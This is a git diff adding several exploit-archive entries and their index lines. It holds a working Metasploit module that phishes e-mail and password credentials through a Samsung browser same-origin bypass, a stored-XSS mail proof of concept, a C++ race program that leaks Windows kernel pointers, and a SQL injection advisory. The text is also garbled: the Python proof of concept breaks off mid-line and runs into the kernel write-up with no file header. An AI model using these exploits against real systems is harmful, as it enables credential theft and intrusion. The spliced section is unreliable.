diff --git a/exploits/android/remote/43376.rb b/exploits/android/remote/43376.rb
new file mode 100755
index 000000000..1de104b04
--- /dev/null
+++ b/exploits/android/remote/43376.rb
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Samsung Internet Browser SOP Bypass',
+ 'Description' => %q(
+ This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
+ Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
+ By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
+ credentials via a fake pop-up.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Dhiraj Mishra', # Original discovery, disclosure
+ 'Tod Beardsley', # Metasploit module
+ 'Jeffrey Martin' # Metasploit module
+ ],
+ 'References' => [
+ [ 'CVE', '2017-17692' ],
+ ['URL', 'http://fr.0day.today/exploit/description/28434']
+ ],
+ 'DisclosureDate' => 'Nov 08 2017',
+ 'Actions' => [[ 'WebServer' ]],
+ 'PassiveActions' => [ 'WebServer' ],
+ 'DefaultAction' => 'WebServer'
+ )
+ )
+
+ register_options([
+ OptString.new('TARGET_URL', [
+ true,
+ 'The URL to spoof origin from.',
+ 'http://example.com/'
+ ]),
+ OptString.new('CUSTOM_HTML', [
+ true,
+ 'HTML to display to the victim.',
+ 'This page has moved. Please click here to redirect your browser.'
+ ])
+ ])
+
+ register_advanced_options([
+ OptString.new('CUSTOM_JS', [
+ false,
+ "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
+ ''
+ ])
+ ])
+
+ end
+
+ def run
+ exploit # start http server
+ end
+
+ def evil_javascript
+ return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
+ js = <<-EOS
+ setTimeout(function(){
+ x.document.body.innerHTML='404 Error
'+
+ 'Oops, something went wrong.
';
+ a=x.prompt('E-mail','');
+ b=x.prompt('Password','');
+ var cred=JSON.stringify({'user':a,'pass':b});
+ var xmlhttp = new XMLHttpRequest;
+ xmlhttp.open('POST', window.location, true);
+ xmlhttp.send(cred);
+ }, 3000);
+ EOS
+ js
+ end
+
+ def setup
+ @html = <<-EOS
+
+
+
+
+
+
+ #{datastore['CUSTOM_HTML']}
+
+ EOS
+ end
+
+ def store_cred(username,password)
+ credential_data = {
+ origin_type: :import,
+ module_fullname: self.fullname,
+ filename: 'msfconsole',
+ workspace_id: myworkspace_id,
+ service_name: 'web_service',
+ realm_value: datastore['TARGET_URL'],
+ realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+ private_type: :password,
+ private_data: password,
+ username: username
+ }
+ create_credential(credential_data)
+ end
+
+ # This assumes the default schema is being used.
+ # If it's not that, it'll just display the collected POST data.
+ def collect_data(request)
+ cred = JSON.parse(request.body)
+ u = cred['user']
+ p = cred['pass']
+ if u.blank? || p.blank?
+ print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
+ else
+ print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
+ store_cred(u,p)
+ end
+ end
+
+ def on_request_uri(cli, request)
+ case request.method.downcase
+ when 'get' # initial connection
+ print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'")
+ print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}")
+ send_response(cli, @html)
+ when 'post' # must have fallen for it
+ collect_data(request)
+ else
+ print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/43378.py b/exploits/multiple/webapps/43378.py
new file mode 100755
index 000000000..c020e1758
--- /dev/null
+++ b/exploits/multiple/webapps/43378.py
@@ -0,0 +1,40 @@
+# Exploit Title: Ability Mail Server 3.3.2 Persistent Cross Site Scripting (XSS)
+# CVE: CVE-2017-17752
+# Date: 19-12-2017
+# Software Link: http://download.codecrafters.com/ams3.exe
+# Exploit Author: Aloyce J. Makalanga
+# Contact: https://twitter.com/aloycemjr
+# Vendor Homepage: http://www.codecrafters.com
+# Category: webapps
+# Attack Type: Remote
+# Impact: Data/Cookie theft
+
+
+1. Description
+
+
+ Ability Mail Server 3.3.2 has Persistent Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). To exploit the vulnerability, the victim must open an email with malicious Javascript inserted into the body of the email.
+
+
+
+2. Proof of Concept
+
+
+
+#!/usr/bin/env python
+email_addr = 'hacker@evil.local'
+email = 'From: %s\n' % email_addr
+email += 'To: %s\n' % email_addr
+email += 'Subject: XSS\n'
+email += 'Content-type: text/html\n\n'
+email +=''
+s = smtplib.SMTP(' k
+ # Child-SP RetAddr Call Site
+ 00 fffff880`03cfd8c8 fffff800`02970229 nt!memcpy+0x3
+ 01 fffff880`03cfd8d0 fffff800`02970752 nt!IopQueryNameInternal+0x289
+ 02 fffff880`03cfd970 fffff800`02967bb4 nt!IopQueryName+0x26
+ 03 fffff880`03cfd9c0 fffff800`0296a80d nt!ObpQueryNameString+0xb0
+ 04 fffff880`03cfdac0 fffff800`0268d093 nt!NtQueryVirtualMemory+0x5fb
+ 05 fffff880`03cfdbb0 00000000`772abf6a nt!KiSystemServiceCopyEnd+0x13
+--- cut ---
+
+An example of an output region is shown below:
+
+--- cut ---
+ kd> db rdx rdx+r8-1
+ fffff8a0`01a78010 2e 00 30 00 00 00 00 00-20 80 a7 01 a0 f8 ff ff ..0..... .......
+ fffff8a0`01a78020 5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00 \.D.e.v.i.c.e.\.
+ fffff8a0`01a78030 48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00 H.a.r.d.d.i.s.k.
+ fffff8a0`01a78040 56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00 V.o.l.u.m.e.2...
+--- cut ---
+
+Here, we can observe a kernel-mode address (fffff8a0`01a78020) of the textual string that follows the UNICODE_STRING, at offset 0x8. This means that the entire original kernel-mode structure is copied to ring-3, and then later the client's UNICODE_STRING.Buffer pointer is fixed up to point into the userland string. This condition could be referred to as a "double write" (as opposed to double fetch), where the kernel first copies some sensitive/confidential data into user-mode, and later overwrites it with legitimate output. Due to the synchronous way applications interact with the system, the clients only see the end result and therefore cannot observe the information disclosure that takes place in the meantime. However, it is possible to exploit the race condition if one is aware of the existence of such a bug.
+
+In order to obtain the leaked kernel pointer, we must read it in between the two writes. This is easiest achieved by running two concurrent threads (on a multi-core machine) -- one continuously invoking the affected NtQueryVirtualMemory syscall, and the other reading the UNICODE_STRING.Buffer member in a loop and checking if it's a kernel-mode pointer. This scheme is implemented in the attached proof-of-concept program. An example output from Windows 7 64-bit is as follows:
+
+--- cut ---
+ C:\>NtQueryVirtualMemory.exe
+ Leaked pointer: fffff8a0014b2010
+ Leaked pointer: fffff8a0014f5010
+ Leaked pointer: fffff8a00153b010
+ Leaked pointer: fffff8a001567010
+ Leaked pointer: fffff8a0015b1010
+ Leaked pointer: fffff8a0015c9010
+ Leaked pointer: fffff8a0015dc010
+ Leaked pointer: fffff8a0015f9010
+ Leaked pointer: fffff8a0017ff010
+ Leaked pointer: fffff8a00180b010
+ Leaked pointer: fffff8a001810010
+ Leaked pointer: fffff8a001832010
+ Leaked pointer: fffff8a001833010
+ Leaked pointer: fffff8a00182a010
+ [...]
+--- cut ---
+
+################################################################################
+
+Update: The insecure behavior of nt!IopQueryNameInternal can be also reached via nt!NtQueryObject. See the following stack trace:
+
+--- cut ---
+ kd> k
+ # Child-SP RetAddr Call Site
+ 00 fffff880`025548a8 fffff800`02970229 nt!memcpy+0x3
+ 01 fffff880`025548b0 fffff800`02970752 nt!IopQueryNameInternal+0x289
+ 02 fffff880`02554950 fffff800`02967bb4 nt!IopQueryName+0x26
+ 03 fffff880`025549a0 fffff800`02971f7d nt!ObpQueryNameString+0xb0
+ 04 fffff880`02554aa0 fffff800`0268d093 nt!NtQueryObject+0x1c7
+ 05 fffff880`02554bb0 00000000`772abe3a nt!KiSystemServiceCopyEnd+0x13
+--- cut ---
+
+And the region being copied:
+
+--- cut ---
+ kd> db rdx rdx+r8-1
+ fffff8a0`01666bf0 2e 00 30 00 00 00 00 00-00 6c 66 01 a0 f8 ff ff ..0......lf.....
+ fffff8a0`01666c00 5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00 \.D.e.v.i.c.e.\.
+ fffff8a0`01666c10 48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00 H.a.r.d.d.i.s.k.
+ fffff8a0`01666c20 56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00 V.o.l.u.m.e.2...
+--- cut ---
+
+Note the kernel-mode address fffff8a0`01666c00 at offset 0x8 of the memory dump.
+
+################################################################################
+
+MSRC have responded that their current policy with regards to addressing kernel pool pointer leaks is as follows:
+
+--- cut ---
+Please note that due to some By-Design kernel pointer leaks already present in our platforms, Information Disclosures which only disclose kernel pool pointers will only be serviced in v.Next until all by design disclosures can be resolved. Information Disclosures of uninitialized kernel memory will continue to be serviced via Security Updates. Any leaks within privileged processes will also be considered v.Next; unless you can supply PoC which proves that you can perform the same leak - but not kernel pool pointer leaks - as an unprivileged user.
+--- cut ---
+
+As this particular bug only facilitates the disclosure of kernel pool pointers, it was classified as a v.Next issue (fixed in a future version of Windows) and closed on the MSRC side. I'm therefore derestricting the details of the bug here, too.
+*/
+
+#include
+#include
+#include
+
+namespace globals {
+ BYTE OutputBuffer[1024];
+} // namespace globals
+
+typedef enum _MEMORY_INFORMATION_CLASS {
+ MemoryMappedFilenameInformation = 2
+} MEMORY_INFORMATION_CLASS;
+
+extern "C"
+NTSTATUS NTAPI NtQueryVirtualMemory(
+ _In_ HANDLE ProcessHandle,
+ _In_opt_ PVOID BaseAddress,
+ _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,
+ _Out_ PVOID MemoryInformation,
+ _In_ SIZE_T MemoryInformationLength,
+ _Out_opt_ PSIZE_T ReturnLength
+);
+
+BOOL IsKernelPointer(ULONG_PTR Pointer) {
+#ifdef _WIN64
+ return (Pointer >= 0xfff8000000000000);
+#else // 32-bit
+ return (Pointer >= 0x80000000);
+#endif
+}
+
+DWORD WINAPI ThreadProc(
+ _In_ LPVOID lpParameter
+) {
+ PUNICODE_STRING OutputString = (PUNICODE_STRING)globals::OutputBuffer;
+ ULONG_PTR LastPointer = 0;
+
+ while (1) {
+ ULONG_PTR Pointer = 0;
+ memcpy(&Pointer, &OutputString->Buffer, sizeof(ULONG_PTR));
+ if (IsKernelPointer(Pointer) && Pointer != LastPointer) {
+ printf("Leaked pointer: %Ix\n", Pointer);
+ LastPointer = Pointer;
+ }
+ }
+ return 0;
+}
+
+int main() {
+ CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
+
+ while (1) {
+ SIZE_T ReturnLength;
+ NTSTATUS st = NtQueryVirtualMemory(GetCurrentProcess(),
+ &main,
+ MemoryMappedFilenameInformation,
+ globals::OutputBuffer,
+ sizeof(globals::OutputBuffer),
+ &ReturnLength);
+
+ if (!NT_SUCCESS(st)) {
+ printf("NtQueryVirtualMemory failed, %x\n", st);
+ ExitProcess(1);
+ }
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/webapps/43379.txt b/exploits/windows/webapps/43379.txt
new file mode 100644
index 000000000..b51b84a3c
--- /dev/null
+++ b/exploits/windows/webapps/43379.txt
@@ -0,0 +1,49 @@
+# Exploit Title: SQL Injection
+# Date: 18 December, 2017
+# Exploit Author: Rajwinder Singh
+# Vendor Homepage: http://www.beims.com/products/
+# Software Link: http://www.beims.com/optional-modules/#ccw
+
+# Version: BEIMS ContractorWeb .NET System 5.18.0.0
+# CVE : 2017-17721
+
+
+Vulnerability Details:
+======================
+WEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.
+
+Impact:
+======================
+1. Database compromise
+2. Server compromise
+3. Application defacement
+4. Internal network access and exploitation.
+
+
+Proof-of-Concept:
+====================
+1. Injected SQL injection payload under page "/CWEBNET/WOSummary/List" in post parameter 'tradestatus' and received SQL error response from server.
+2. Saved request in the text file to run automated SQLmap tool for further enumeration and successfully dumped full database which will not be disclosed.
+
+Affected Component:
+====================
+URL: www.domain.com/CWEBNET/WOSummary/List
+post parameters: tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, workorderstatus
+
+Disclosure Timeline:
+=====================
+Mitre Notification: 18 December, 2017
+Public Disclosure: 18 December, 2017
+
+Exploitation Technique:
+=======================
+Remote
+
+Severity Level:
+================
+Critical
+
+Description:
+=====================================================
+Request Method(s): [+] POST
+Vulnerable Product: [+] BEIMS ContractorWeb .NET System 5.18.0.0
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index db7b379ef..351a29450 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5431,6 +5431,7 @@ id,file,description,date,author,type,platform,port
43371,exploits/windows/dos/43371.html,"Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable",2017-12-19,"Google Security Research",dos,windows,
43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
+43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@@ -15860,6 +15861,7 @@ id,file,description,date,author,type,platform,port
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
+43376,exploits/android/remote/43376.rb,"Samsung Internet Browser - SOP Bypass (Metasploit)",2017-12-20,"Dhiraj Mishra",remote,android,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@@ -37652,6 +37654,8 @@ id,file,description,date,author,type,platform,port
43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware,
43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php,
+43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,
+43379,exploits/windows/webapps/43379.txt,"BEIMS ContractorWeb 5.18.0.0 - SQL Injection",2017-12-20,"Rajwinder Singh",webapps,windows,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,